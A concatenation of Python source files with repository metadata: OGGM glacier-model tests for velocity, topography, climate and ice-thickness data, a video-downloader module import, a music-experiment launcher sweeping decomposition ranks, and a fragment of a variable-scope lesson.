    # the in-flight NODE request is tracked together with them.
    request_couples = [request_couple, *
                       sdk_send_random_requests(looper, sdk_pool_handle,
                                                sdk_wallet_client, 5)]

    # Make sure all requests are completed
    total_timeout = sdk_eval_timeout(len(request_couples), len(txnPoolNodeSet))
    sdk_get_and_check_replies(looper, request_couples, timeout=total_timeout)

    # Make sure pool is functional
    sdk_ensure_pool_functional(looper, txnPoolNodeSet,
                               sdk_wallet_client, sdk_pool_handle)
| 49.606383
| 85
| 0.610337
|
4a0f518bb8372855210207d52b453c9e6aa3b55c
| 24,996
|
py
|
Python
|
oggm/tests/test_shop.py
|
skachuck/oggm
|
b391e6923fb0c5269e10ea260f5199a26d5e1082
|
[
"BSD-3-Clause"
] | 156
|
2015-10-11T16:38:43.000Z
|
2022-03-24T04:19:16.000Z
|
oggm/tests/test_shop.py
|
skachuck/oggm
|
b391e6923fb0c5269e10ea260f5199a26d5e1082
|
[
"BSD-3-Clause"
] | 953
|
2015-10-11T16:26:14.000Z
|
2022-03-27T23:19:19.000Z
|
oggm/tests/test_shop.py
|
skachuck/oggm
|
b391e6923fb0c5269e10ea260f5199a26d5e1082
|
[
"BSD-3-Clause"
] | 92
|
2015-10-19T08:53:23.000Z
|
2022-03-28T08:00:17.000Z
|
import os
import warnings
import pytest
salem = pytest.importorskip('salem')
gpd = pytest.importorskip('geopandas')
import oggm
import xarray as xr
import numpy as np
import pandas as pd
from oggm import utils
from oggm.utils import get_demo_file
from oggm.shop import its_live, rgitopo, bedtopo
from oggm.core import gis, centerlines, massbalance
from oggm import cfg, tasks, workflow
pytestmark = pytest.mark.test_env("utils")
DO_PLOT = False
class Test_its_live:
    """Tests for reprojecting ITS_LIVE velocity rasters onto a glacier grid."""

    @pytest.mark.slow
    def test_repro_to_glacier(self, class_case_dir, monkeypatch):
        """Reproject demo ITS_LIVE vx/vy tiles to the Columbia glacier grid and
        cross-check against a plain rasterio reprojection."""
        # Init
        cfg.initialize()
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PARAMS['use_intersects'] = False
        cfg.PATHS['dem_file'] = get_demo_file('dem_Columbia.tif')
        cfg.PARAMS['border'] = 10

        entity = gpd.read_file(get_demo_file('RGI60-01.10689.shp')).iloc[0]
        gdir = oggm.GlacierDirectory(entity)
        tasks.define_glacier_region(gdir)
        tasks.glacier_masks(gdir)

        # use our files (patch the download machinery to read local demo tiles)
        region_files = {'ALA':
                            {'vx': get_demo_file('crop_ALA_G0120_0000_vx.tif'),
                             'vy': get_demo_file('crop_ALA_G0120_0000_vy.tif')}
                        }
        monkeypatch.setattr(its_live, 'region_files', region_files)
        monkeypatch.setattr(utils, 'file_downloader', lambda x: x)

        with warnings.catch_warnings():
            warnings.filterwarnings("ignore", category=RuntimeWarning)
            its_live.velocity_to_gdir(gdir)

        with xr.open_dataset(gdir.get_filepath('gridded_data')) as ds:
            mask = ds.glacier_mask.data.astype(bool)
            vx = ds.obs_icevel_x.where(mask).data
            vy = ds.obs_icevel_y.where(mask).data

        # Sanity bounds on the velocity magnitude over the glacier.
        vel = np.sqrt(vx**2 + vy**2)
        assert np.nanmax(vel) > 2900
        assert np.nanmin(vel) < 2

        # We reproject with rasterio and check no big diff
        cfg.BASENAMES['its_live_vx'] = ('its_live_vx.tif', '')
        cfg.BASENAMES['its_live_vy'] = ('its_live_vy.tif', '')
        gis.rasterio_to_gdir(gdir, region_files['ALA']['vx'], 'its_live_vx',
                             resampling='bilinear')
        gis.rasterio_to_gdir(gdir, region_files['ALA']['vy'], 'its_live_vy',
                             resampling='bilinear')

        with xr.open_rasterio(gdir.get_filepath('its_live_vx')) as da:
            _vx = da.where(mask).data.squeeze()
        with xr.open_rasterio(gdir.get_filepath('its_live_vy')) as da:
            _vy = da.where(mask).data.squeeze()

        _vel = np.sqrt(_vx**2 + _vy**2)
        np.testing.assert_allclose(utils.rmsd(vel[mask], _vel[mask]), 0,
                                   atol=40)
        np.testing.assert_allclose(utils.md(vel[mask], _vel[mask]), 0,
                                   atol=8)

        # Optional visual check, enabled via the module-level DO_PLOT flag.
        if DO_PLOT:
            import matplotlib.pyplot as plt
            smap = salem.Map(gdir.grid.center_grid, countries=False)
            smap.set_shapefile(gdir.read_shapefile('outlines'))
            with warnings.catch_warnings():
                warnings.filterwarnings('ignore', category=RuntimeWarning)
                smap.set_topography(gdir.get_filepath('dem'))
            vel = np.sqrt(vx ** 2 + vy ** 2)
            smap.set_data(vel)
            smap.set_plot_params(cmap='Blues', vmin=None, vmax=None)
            xx, yy = gdir.grid.center_grid.xy_coordinates
            xx, yy = smap.grid.transform(xx, yy, crs=gdir.grid.proj)
            # Subsample the quiver arrows so the plot stays readable.
            yy = yy[2::5, 2::5]
            xx = xx[2::5, 2::5]
            vx = vx[2::5, 2::5]
            vy = vy[2::5, 2::5]
            f, ax = plt.subplots()
            smap.visualize(ax=ax, title='ITS_LIVE velocity',
                           cbar_title='m yr-1')
            ax.quiver(xx, yy, vx, vy)
            plt.show()
class Test_rgitopo:
    """Tests for initializing glacier directories from pre-built RGI-TOPO DEMs."""

    def test_from_dem(self, class_case_dir, monkeypatch):
        """A glacier directory built from RGI-TOPO has the expected input files."""
        # Init
        cfg.initialize()
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PARAMS['border'] = 10

        # Point the downloader at the test-server copy of the DEM archive.
        monkeypatch.setattr(rgitopo, 'DEMS_URL', 'https://cluster.klima.uni-br'
                                                 'emen.de/~oggm/test_gdirs/dem'
                                                 's_v1/default/')

        gd = rgitopo.init_glacier_directories_from_rgitopo(['RGI60-09.01004'])
        gd = gd[0]

        assert gd.has_file('dem')
        assert gd.has_file('dem_source')
        assert gd.has_file('outlines')
        assert gd.has_file('intersects')

        # we can work from here
        tasks.glacier_masks(gd)

    def test_qc(self, class_case_dir, monkeypatch):
        """The DEM quality check reports several (mostly passing) criteria."""
        # Init
        cfg.initialize()
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PARAMS['border'] = 10

        monkeypatch.setattr(rgitopo, 'DEMS_URL', 'https://cluster.klima.uni-br'
                                                 'emen.de/~oggm/test_gdirs/dem'
                                                 's_v1/default/')

        gd = rgitopo.init_glacier_directories_from_rgitopo(['RGI60-09.01004'],
                                                           keep_dem_folders=True)
        out = rgitopo.dem_quality_check(gd[0])
        assert len(out) > 5
        assert np.sum(list(out.values())) > 5
class Test_ecmwf:
    """Tests for the ECMWF climate-data shop (ERA5, CERA, combinations)."""

    def test_get_ecmwf_file(self):
        """Every advertised dataset/variable combination resolves to a file,
        and unknown names raise ValueError."""
        from oggm.shop import ecmwf
        # NOTE(review): `vars` shadows the builtin; kept as-is (doc-only edit)
        for d, vars in ecmwf.BASENAMES.items():
            for v, _ in vars.items():
                assert os.path.isfile(ecmwf.get_ecmwf_file(d, v))
        # Unknown variable name
        with pytest.raises(ValueError):
            ecmwf.get_ecmwf_file('ERA5', 'zoup')
        # Unknown dataset name
        with pytest.raises(ValueError):
            ecmwf.get_ecmwf_file('zoup', 'tmp')

    def test_ecmwf_historical_delta_method(self, class_case_dir):
        """Bias-correct CERA towards ERA5 with the historical delta method,
        in both 'scaled only' and 'replace with reference data' modes."""
        # Init
        cfg.initialize()
        cfg.PARAMS['use_intersects'] = False
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
        hef_file = get_demo_file('Hintereisferner_RGI5.shp')
        gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
        # Process the two raw climate files that the delta method combines
        tasks.process_ecmwf_data(gdir, dataset='ERA5',
                                 output_filesuffix='ERA5')
        tasks.process_ecmwf_data(gdir, dataset='CERA',
                                 output_filesuffix='CERA')

        # Original BC
        tasks.historical_delta_method(gdir,
                                      replace_with_ref_data=False,
                                      delete_input_files=False,
                                      ref_filesuffix='ERA5',
                                      hist_filesuffix='CERA',
                                      output_filesuffix='CERA_alone')

        f_ref = gdir.get_filepath('climate_historical', filesuffix='ERA5')
        f_h = gdir.get_filepath('climate_historical', filesuffix='CERA_alone')
        with xr.open_dataset(f_ref) as ref, xr.open_dataset(f_h) as his:
            # Let's do some basic checks
            assert ref.attrs['ref_hgt'] == his.attrs['ref_hgt']
            ci = gdir.get_climate_info('CERA_alone')
            assert ci['baseline_climate_source'] == 'CERA|ERA5'
            assert ci['baseline_hydro_yr_0'] == 1902
            assert ci['baseline_hydro_yr_1'] == 2010

            # Climate on common period
            # (minus one year because of the automated stuff in code
            sref = ref.sel(time=slice(ref.time[12], his.time[-1]))
            shis = his.sel(time=slice(ref.time[12], his.time[-1]))

            # Climate during the chosen period should be the same
            np.testing.assert_allclose(sref.temp.mean(),
                                       shis.temp.mean(),
                                       atol=1e-3)
            np.testing.assert_allclose(sref.prcp.mean(),
                                       shis.prcp.mean(),
                                       rtol=1e-3)

            # And also the annual cycle
            srefm = sref.groupby('time.month').mean(dim='time')
            shism = shis.groupby('time.month').mean(dim='time')
            np.testing.assert_allclose(srefm.temp, shism.temp, atol=1e-3)
            np.testing.assert_allclose(srefm.prcp, shism.prcp, rtol=1e-3)

            # And its std dev - but less strict
            srefm = sref.groupby('time.month').std(dim='time')
            shism = shis.groupby('time.month').std(dim='time')
            np.testing.assert_allclose(srefm.temp, shism.temp, rtol=5e-2)
            with pytest.raises(AssertionError):
                # This clearly is not scaled
                np.testing.assert_allclose(srefm.prcp, shism.prcp, rtol=0.5)

        # Replaced
        tasks.historical_delta_method(gdir,
                                      replace_with_ref_data=True,
                                      delete_input_files=False,
                                      ref_filesuffix='ERA5',
                                      hist_filesuffix='CERA',
                                      output_filesuffix='CERA_repl')

        f_ref = gdir.get_filepath('climate_historical', filesuffix='ERA5')
        f_h = gdir.get_filepath('climate_historical', filesuffix='CERA_repl')
        f_hr = gdir.get_filepath('climate_historical', filesuffix='CERA')
        with xr.open_dataset(f_ref) as ref, xr.open_dataset(f_h) as his, \
                xr.open_dataset(f_hr) as his_ref:
            # Let's do some basic checks
            assert ref.attrs['ref_hgt'] == his.attrs['ref_hgt']
            ci = gdir.get_climate_info('CERA_repl')
            assert ci['baseline_climate_source'] == 'CERA+ERA5'
            assert ci['baseline_hydro_yr_0'] == 1902
            assert ci['baseline_hydro_yr_1'] == 2018

            # Climate on common period
            sref = ref.sel(time=slice(ref.time[0], his.time[-1]))
            shis = his.sel(time=slice(ref.time[0], his.time[-1]))

            # Climate during the chosen period should be the same
            # (exact match here: the reference data replaces the output)
            np.testing.assert_allclose(sref.temp.mean(),
                                       shis.temp.mean())
            np.testing.assert_allclose(sref.prcp.mean(),
                                       shis.prcp.mean())

            # And also the annual cycle
            srefm = sref.groupby('time.month').mean(dim='time')
            shism = shis.groupby('time.month').mean(dim='time')
            np.testing.assert_allclose(srefm.temp, shism.temp)
            np.testing.assert_allclose(srefm.prcp, shism.prcp)

            # And its std dev - should be same
            srefm = sref.groupby('time.month').std(dim='time')
            shism = shis.groupby('time.month').std(dim='time')
            np.testing.assert_allclose(srefm.temp, shism.temp)
            np.testing.assert_allclose(srefm.prcp, shism.prcp)

            # In the past the two CERA datasets are different
            his_ref = his_ref.sel(time=slice('1910', '1940'))
            his = his.sel(time=slice('1910', '1940'))
            assert np.abs(his.temp.mean() - his_ref.temp.mean()) > 1
            assert np.abs(his.temp.std() - his_ref.temp.std()) > 0.3

        # Delete files
        # (default behavior removes the two input files after combining)
        tasks.historical_delta_method(gdir,
                                      ref_filesuffix='ERA5',
                                      hist_filesuffix='CERA')
        assert not os.path.exists(gdir.get_filepath('climate_historical',
                                                    filesuffix='ERA5'))
        assert not os.path.exists(gdir.get_filepath('climate_historical',
                                                    filesuffix='CERA'))

    def test_ecmwf_workflow(self, class_case_dir):
        """The combined baseline-climate strings ('CERA+ERA5L', 'CERA|ERA5')
        are dispatched correctly by process_climate_data."""
        # Init
        cfg.initialize()
        cfg.PARAMS['use_intersects'] = False
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
        hef_file = get_demo_file('Hintereisferner_RGI5.shp')
        gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]

        cfg.PARAMS['baseline_climate'] = 'CERA+ERA5L'
        tasks.process_climate_data(gdir)
        f_ref = gdir.get_filepath('climate_historical')
        with xr.open_dataset(f_ref) as his:
            # Let's do some basic checks
            ci = gdir.get_climate_info()
            assert ci['baseline_climate_source'] == 'CERA+ERA5L'
            assert ci['baseline_hydro_yr_0'] == 1902
            assert ci['baseline_hydro_yr_1'] == 2018

        cfg.PARAMS['baseline_climate'] = 'CERA|ERA5'
        tasks.process_climate_data(gdir)
        f_ref = gdir.get_filepath('climate_historical')
        with xr.open_dataset(f_ref) as his:
            # Let's do some basic checks
            ci = gdir.get_climate_info()
            assert ci['baseline_climate_source'] == 'CERA|ERA5'
            assert ci['baseline_hydro_yr_0'] == 1902
            assert ci['baseline_hydro_yr_1'] == 2010
class Test_climate_datasets:
    """Cross-dataset consistency tests for the supported baseline climates."""

    def test_all_at_once(self, class_case_dir):
        """Process all baseline climates for HEF and check that they agree
        (after a simple lapse-rate correction for reference height)."""
        # Init
        cfg.initialize()
        cfg.PARAMS['use_intersects'] = False
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
        hef_file = get_demo_file('Hintereisferner_RGI5.shp')
        gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
        exps = ['CRU', 'HISTALP', 'ERA5', 'ERA5L', 'CERA']
        ref_hgts = []
        dft = []
        dfp = []
        for base in exps:
            cfg.PARAMS['baseline_climate'] = base
            tasks.process_climate_data(gdir, output_filesuffix=base)
            f = gdir.get_filepath('climate_historical', filesuffix=base)
            with xr.open_dataset(f) as ds:
                ref_hgts.append(ds.ref_hgt)
                assert ds.ref_pix_dis < 30000
                dft.append(ds.temp.to_series())
                dfp.append(ds.prcp.to_series())
        dft = pd.concat(dft, axis=1, keys=exps)
        dfp = pd.concat(dfp, axis=1, keys=exps)
        # Common period
        dfy = dft.resample('AS').mean().dropna().iloc[1:]
        dfm = dft.groupby(dft.index.month).mean()
        assert dfy.corr().min().min() > 0.44  # ERA5L and CERA do no correlate
        assert dfm.corr().min().min() > 0.97
        dfavg = dfy.describe()

        # Correct for hgt
        # (simple constant lapse rate of 6.5 K km-1)
        ref_h = ref_hgts[0]
        for h, d in zip(ref_hgts, exps):
            dfy[d] = dfy[d] - 0.0065 * (ref_h - h)
            dfm[d] = dfm[d] - 0.0065 * (ref_h - h)
        dfavg_cor = dfy.describe()

        # After correction less spread
        assert dfavg_cor.loc['mean'].std() < 0.8 * dfavg.loc['mean'].std()
        assert dfavg_cor.loc['mean'].std() < 2.1

        # PRECIP
        # Common period
        dfy = dfp.resample('AS').mean().dropna().iloc[1:] * 12
        dfm = dfp.groupby(dfp.index.month).mean()
        assert dfy.corr().min().min() > 0.5
        assert dfm.corr().min().min() > 0.8
        dfavg = dfy.describe()
        assert dfavg.loc['mean'].std() / dfavg.loc['mean'].mean() < 0.25  # %

    def test_vdr(self, class_case_dir):
        """ERA5 and ERA5dr agree on temp/prcp; ERA5dr additionally provides
        gradient and temp_std variables."""
        # Init
        cfg.initialize()
        cfg.PARAMS['use_intersects'] = False
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
        hef_file = get_demo_file('Hintereisferner_RGI5.shp')
        gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
        exps = ['ERA5', 'ERA5dr']
        files = []
        ref_hgts = []
        for base in exps:
            cfg.PARAMS['baseline_climate'] = base
            tasks.process_climate_data(gdir, output_filesuffix=base)
            files.append(gdir.get_filepath('climate_historical',
                                           filesuffix=base))
            with xr.open_dataset(files[-1]) as ds:
                ref_hgts.append(ds.ref_hgt)
                assert ds.ref_pix_dis < 10000
        with xr.open_dataset(files[0]) as d1, xr.open_dataset(files[1]) as d2:
            np.testing.assert_allclose(d1.temp, d2.temp)
            np.testing.assert_allclose(d1.prcp, d2.prcp)
            # Fake tests, the plots look plausible
            np.testing.assert_allclose(d2.gradient.mean(), -0.0058, atol=.001)
            np.testing.assert_allclose(d2.temp_std.mean(), 3.35, atol=0.1)

    @pytest.mark.slow
    def test_hydro_month_changes(self, hef_gdir):
        """Changing the hydrological start month must shift the time series
        consistently across all supported climate datasets."""
        # test for HEF if applying different hydro_months does the right thing
        # check if mb of neighbouring hydro_months correlate
        # do this for different climate scenarios

        # maybe there is already somewhere an overview or a better way to get
        # these dates, but I did not find it
        base_data_time = {'CRU': {'start_year': 1901, 'end_year': 2014},
                          'ERA5': {'start_year': 1979, 'end_year': 2018},
                          'ERA5dr': {'start_year': 1979, 'end_year': 2019},
                          'HISTALP': {'start_year': 1850, 'end_year': 2014},
                          'CERA': {'start_year': 1901, 'end_year': 2010},
                          'ERA5L': {'start_year': 1981, 'end_year': 2018}}

        gdir = hef_gdir
        oggm.core.flowline.init_present_time_glacier(gdir)
        mb_mod = oggm.core.massbalance.PastMassBalance(gdir)
        h, w = gdir.get_inversion_flowline_hw()

        exps = ['ERA5dr', 'CRU', 'HISTALP', 'ERA5', 'ERA5L', 'CERA']
        for base in exps:
            # this does not need to be the best one,
            # just for comparison between different hydro months
            mu_opt = 213.54
            files = []
            ref_hgts = []
            dft = []
            dfp = []
            tot_mbs = []
            cfg.PARAMS['baseline_climate'] = base
            for m in np.arange(1, 13):
                cfg.PARAMS['hydro_month_nh'] = m
                fsuff = '_{}_{}'.format(base, m)
                tasks.process_climate_data(gdir, output_filesuffix=fsuff)
                files.append(gdir.get_filepath('climate_historical',
                                               filesuffix=fsuff))
                with xr.open_dataset(files[-1]) as ds:
                    ref_hgts.append(ds.ref_hgt)
                    dft.append(ds.temp.to_series())
                    dfp.append(ds.prcp.to_series())
                    ci = gdir.get_climate_info(input_filesuffix=fsuff)
                    # check if the right climate source is used
                    assert base in ci['baseline_climate_source']
                    # zero-padded month strings for the expected start/end dates
                    mm = str(m) if m > 9 else str(0)+str(m)
                    mm_e = str(m-1) if (m-1) > 9 else str(0)+str(m-1)
                    b_s_y = base_data_time[base]['start_year']
                    b_e_y = base_data_time[base]['end_year']
                    stime = '{}-{}-01'.format(b_s_y, mm)
                    assert ds.time[0] == np.datetime64(stime)
                    if m == 1:
                        # calendar year == hydro year
                        assert ci['baseline_hydro_yr_0'] == b_s_y
                        if base == 'ERA5dr':
                            # do not have full 2019
                            assert ci['baseline_hydro_yr_1'] == b_e_y - 1
                        else:
                            assert ci['baseline_hydro_yr_1'] == b_e_y
                    elif m < 7 and base == 'ERA5dr':
                        # have data till 2019-05 for ERA5dr
                        stime = '{}-{}-01'.format(b_e_y, mm_e)
                        assert ds.time[-1] == np.datetime64(stime)
                        assert ci['baseline_hydro_yr_0'] == b_s_y + 1
                        assert ci['baseline_hydro_yr_1'] == b_e_y
                    else:
                        assert ci['baseline_hydro_yr_0'] == b_s_y + 1
                        if base == 'ERA5dr':
                            # do not have full 2019
                            stime = '{}-{}-01'.format(b_e_y-1, mm_e)
                            assert ds.time[-1] == np.datetime64(stime)
                            assert ci['baseline_hydro_yr_1'] == b_e_y - 1
                        else:
                            assert ci['baseline_hydro_yr_1'] == b_e_y
                            stime = '{}-{}-01'.format(b_e_y, mm_e)
                            assert ds.time[-1] == np.datetime64(stime)
                    # bias=0 and check_calib_params=False: we only compare
                    # hydro months against each other, not against obs
                    mb_mod = massbalance.PastMassBalance(gdir,
                                                         mu_star=mu_opt,
                                                         input_filesuffix=fsuff,
                                                         bias=0,
                                                         check_calib_params=False)
                    years = np.arange(ds.hydro_yr_0, ds.hydro_yr_1 + 1)
                    mb_ts = mb_mod.get_specific_mb(heights=h, widths=w,
                                                   year=years)
                    tot_mbs.append(pd.Series(mb_ts))

            # check if all ref_hgts are equal
            # means that we likely compare same glacier and climate dataset
            assert len(np.unique(ref_hgts)) == 1
            # concatenate temperature and prcp from different hydromonths
            dft = pd.concat(dft, axis=1, keys=np.arange(1, 13))
            dfp = pd.concat(dfp, axis=1, keys=np.arange(1, 13))
            # Common period
            dft_na = dft.dropna().iloc[1:]
            dfp_na = dfp.dropna().iloc[1:]
            # check if the common period of temperature prcp
            # series is equal for all starting hydromonth dates
            assert np.all(dft_na.eq(dft_na.iloc[:, 0], axis=0).all(1))
            assert np.all(dfp_na.eq(dfp_na.iloc[:, 0], axis=0).all(1))

            # mass balance of different years
            pd_tot_mbs = pd.concat(tot_mbs, axis=1, keys=np.arange(1, 13))
            pd_tot_mbs = pd_tot_mbs.dropna()

            # compute correlations
            corrs = []
            for m in np.arange(1, 12):
                # check if correlation between time series of hydro_month =1,
                # is high to hydro_month = 2 and so on
                corrs.append(pd_tot_mbs.corr().loc[m, m+1])
            # would be better if for hydro_month=12,
            # correlation is tested to next year
            assert np.mean(corrs) > 0.9
class Test_bedtopo:
    """Tests for the bedtopo shop (consensus ice-thickness product)."""

    def test_add_consensus(self, class_case_dir, monkeypatch):
        """add_consensus_thickness reprojects the consensus thickness onto
        the glacier grid while conserving total volume, and the result flows
        through the elevation-band flowline workflow."""
        # Init
        cfg.initialize()
        cfg.PARAMS['use_intersects'] = False
        cfg.PATHS['working_dir'] = class_case_dir
        cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
        entity = gpd.read_file(get_demo_file('Hintereisferner_RGI5.shp'))
        # The demo thickness file is named after the RGI6 id
        entity['RGIId'] = 'RGI60-11.00897'
        gdir = workflow.init_glacier_directories(entity)[0]
        tasks.define_glacier_region(gdir)
        tasks.glacier_masks(gdir)

        # Avoid the real download: serve the demo thickness file instead
        ft = utils.get_demo_file('RGI60-11.00897_thickness.tif')
        monkeypatch.setattr(utils, 'file_downloader', lambda x: ft)
        bedtopo.add_consensus_thickness(gdir)

        # Check with rasterio
        # (reference reprojection of the same file, bilinear like OGGM's)
        cfg.add_to_basenames('consensus', 'consensus.tif')
        gis.rasterio_to_gdir(gdir, ft, 'consensus', resampling='bilinear')

        with xr.open_dataset(gdir.get_filepath('gridded_data')) as ds:
            mine = ds.consensus_ice_thickness
        with xr.open_rasterio(gdir.get_filepath('consensus')) as ds:
            ref = ds.isel(band=0)

        # Check area
        my_area = np.sum(np.isfinite(mine.data)) * gdir.grid.dx**2
        np.testing.assert_allclose(my_area, gdir.rgi_area_m2, rtol=0.07)
        rio_area = np.sum(ref.data > 0) * gdir.grid.dx**2
        np.testing.assert_allclose(rio_area, gdir.rgi_area_m2, rtol=0.15)
        np.testing.assert_allclose(my_area, rio_area, rtol=0.15)

        # They are not same:
        # - interpolation not 1to1 same especially at borders
        # - we preserve total volume
        np.testing.assert_allclose(mine.sum(), ref.sum(), rtol=0.01)
        assert utils.rmsd(ref, mine) < 2

        # Check vol
        # (against the ITMIX consensus volume table)
        cdf = pd.read_hdf(utils.get_demo_file('rgi62_itmix_df.h5'))
        ref_vol = cdf.loc[gdir.rgi_id].vol_itmix_m3
        my_vol = mine.sum() * gdir.grid.dx**2
        np.testing.assert_allclose(my_vol, ref_vol)

        # Now check the rest of the workflow
        # Check that no error when var not there
        # ('foo' is deliberately not a gridded variable)
        vn = 'consensus_ice_thickness'
        centerlines.elevation_band_flowline(gdir, bin_variables=[vn, 'foo'])

        # Check vol
        # (binned thickness times bin area must still give the same volume)
        df = pd.read_csv(gdir.get_filepath('elevation_band_flowline'),
                         index_col=0)
        my_vol = (df[vn] * df['area']).sum()
        np.testing.assert_allclose(my_vol, ref_vol)

        centerlines.fixed_dx_elevation_band_flowline(gdir,
                                                     bin_variables=[vn, 'foo'])
        fdf = pd.read_csv(gdir.get_filepath('elevation_band_flowline',
                                            filesuffix='_fixed_dx'),
                          index_col=0)

        # Check vol
        my_vol = (fdf[vn] * fdf['area_m2']).sum()
        np.testing.assert_allclose(my_vol, ref_vol)
| 41.799331
| 82
| 0.550248
|
4a0f53cfedf7b8170d1524d5b3f7a08375958a1d
| 74
|
py
|
Python
|
src/video_dl/sites/pornhub/__init__.py
|
Jamesliyuan/video-dl
|
5369a8a4204787473891f959fd3fa57086a01862
|
[
"Apache-2.0"
] | 2
|
2022-01-22T18:11:33.000Z
|
2022-01-22T18:11:36.000Z
|
src/video_dl/sites/pornhub/__init__.py
|
Jamesliyuan/video-dl
|
5369a8a4204787473891f959fd3fa57086a01862
|
[
"Apache-2.0"
] | null | null | null |
src/video_dl/sites/pornhub/__init__.py
|
Jamesliyuan/video-dl
|
5369a8a4204787473891f959fd3fa57086a01862
|
[
"Apache-2.0"
] | 2
|
2021-08-19T15:56:15.000Z
|
2022-01-22T18:11:24.000Z
|
from .spider import PornhubSpider
from .extractor import PornhubExtractor
| 24.666667
| 39
| 0.864865
|
4a0f53dbf20f7772ede5c536aba74670f3d86c99
| 3,074
|
py
|
Python
|
music_experiments/multyexp_launcher.py
|
fosfrancesco/InvertibleCE
|
c972dc55040da085fc43e4128bc1955bc8e2114b
|
[
"Apache-2.0"
] | null | null | null |
music_experiments/multyexp_launcher.py
|
fosfrancesco/InvertibleCE
|
c972dc55040da085fc43e4128bc1955bc8e2114b
|
[
"Apache-2.0"
] | null | null | null |
music_experiments/multyexp_launcher.py
|
fosfrancesco/InvertibleCE
|
c972dc55040da085fc43e4128bc1955bc8e2114b
|
[
"Apache-2.0"
] | null | null | null |
"""Batch launcher for NMF / NTD concept-explanation experiments.

For every pair of target classes, runs start_experiment_noclick over a grid
of reducers and decomposition ranks (NMF, 3-way NTD, 4-way NTD). A failure
in one configuration is printed and the batch continues.
"""
from experiments_script import start_experiment_noclick

# Shared experiment settings
gpu_number = 0
layer = "layer4"
batch_size = 10
max_iter = 500

reducers = ["NMF", "NTD"]

# Ranks for the NMF reducer (number of components)
nmf_ranks = ["1", "2", "3", "4", "5", "6", "10", "8", "12"]

# Ranks for the 3-way NTD reducer (one rank per tensor mode)
ntd3_ranks = [
    "[3,20,100]",
    "[6,20,100]",
    "[10,20,100]",
    "[3,20,25]",
    "[6,20,25]",
    "[10,20,25]",
    "[3,30,100]",
    "[6,30,100]",
    "[10,30,100]",
    "[6,39,80]",
    "[10,39,80]",
    "[6,39,200]",
    "[10,39,200]",
    "[8,39,100]",
    "[10,39,100]",
    "[10,39,375]",
    "[8,39,375]",
    "[6,39,375]",
    "[3,39,375]",
    "[2,39,375]",
    "[1,39,375]",
    "[4,20,25]",
    "[5,20,25]",
    "[4,30,100]",
    "[5,30,100]",
    "[4,39,375]",
    "[5,39,375]",
]

# Ranks for the 4-way NTD reducer (one rank per tensor mode)
ntd4_ranks = [
    "[3, 3, 2, 25]",
    "[1, 3, 2, 25]",
    "[2, 3, 2, 25]",
    "[3, 5, 3, 25]",
    "[3, 13, 3, 25]",
    "[6, 13, 3, 25]",
    # BUG FIX: these two entries were accidentally fused into one string by
    # a missing comma (implicit string concatenation); now listed separately.
    "[3, 3, 3, 25]",
    "[3, 2, 3, 20]",
    "[6, 2, 3, 20]",
    "[10, 2, 3, 20]",
    "[3, 2, 3, 25]",
    "[6, 2, 3, 25]",
    "[10, 2, 3, 25]",
    "[10, 13, 3, 375]",
    "[10, 3, 3, 375]",
    "[8, 13, 3, 375]",
    "[6, 13, 3, 375]",
    "[3, 13, 3, 375]",
    "[1, 13, 3, 375]",
    "[2, 13, 3, 375]",
    "[4, 13, 3, 375]",
    "[5, 13, 3, 375]",
    "[4, 2, 3, 20]",
    "[5, 2, 3, 20]",
    "[4, 2, 3, 25]",
    "[5, 2, 3, 25]",
]

# Tensor dimensionality per reducer family (3-way vs 4-way)
dimensions = [3, 4]

# Index reference for the target pairs below — TODO confirm ordering matches
# the dataset used by experiments_script:
# target_composers = [
#     "Alexander Scriabin",
#     "Claude Debussy",
#     "Domenico Scarlatti",
#     "Franz Liszt",
#     "Franz Schubert",
#     "Frédéric Chopin",
#     "Johann Sebastian Bach",
#     "Johannes Brahms",
#     "Joseph Haydn",
#     "Ludwig van Beethoven",
#     "Robert Schumann",
#     "Sergei Rachmaninoff",
#     "Wolfgang Amadeus Mozart",
# ]
# targets = "[5,6]"
targets_list = ["[6,9]", "[0,4]", "[5,6]", "[9,12]", "[9,11]"]


def _run_rank_sweep(reducer, targets, dimension, ranks):
    """Run one experiment per rank; print and continue on any failure.

    Parameters: reducer name, targets string (e.g. "[5,6]"), tensor
    dimensionality, and the list of rank strings to sweep over.
    """
    for r in ranks:
        try:
            start_experiment_noclick(
                reducer,
                max_iter,
                gpu_number,
                targets,
                dimension,
                r,
                layer,
                batch_size,
            )
        except Exception as e:
            # A single failed configuration must not abort the whole batch
            print("!!!!!!!!!!!")
            print(e)


for targets in targets_list:
    # NMF experiment
    _run_rank_sweep(reducers[0], targets, dimensions[0], nmf_ranks)
    # NTD3 experiment
    _run_rank_sweep(reducers[1], targets, dimensions[0], ntd3_ranks)
    # NTD4 experiment
    _run_rank_sweep(reducers[1], targets, dimensions[1], ntd4_ranks)
| 21.957143
| 62
| 0.386792
|
4a0f547aa0f50557b974e3303b6dd75d51830e32
| 171
|
py
|
Python
|
Modulo_1/semana2/variables_contantes/variables-afectando-alcance-variables.py
|
rubens233/cocid_python
|
492ebdf21817e693e5eb330ee006397272f2e0cc
|
[
"MIT"
] | null | null | null |
Modulo_1/semana2/variables_contantes/variables-afectando-alcance-variables.py
|
rubens233/cocid_python
|
492ebdf21817e693e5eb330ee006397272f2e0cc
|
[
"MIT"
] | null | null | null |
Modulo_1/semana2/variables_contantes/variables-afectando-alcance-variables.py
|
rubens233/cocid_python
|
492ebdf21817e693e5eb330ee006397272f2e0cc
|
[
"MIT"
] | 1
|
2022-03-04T00:57:18.000Z
|
2022-03-04T00:57:18.000Z
|
# Teaching example: how the `global` statement affects variable scope.
# NOTE(review): `global` at module level is a no-op; kept as in the lesson.
global texto
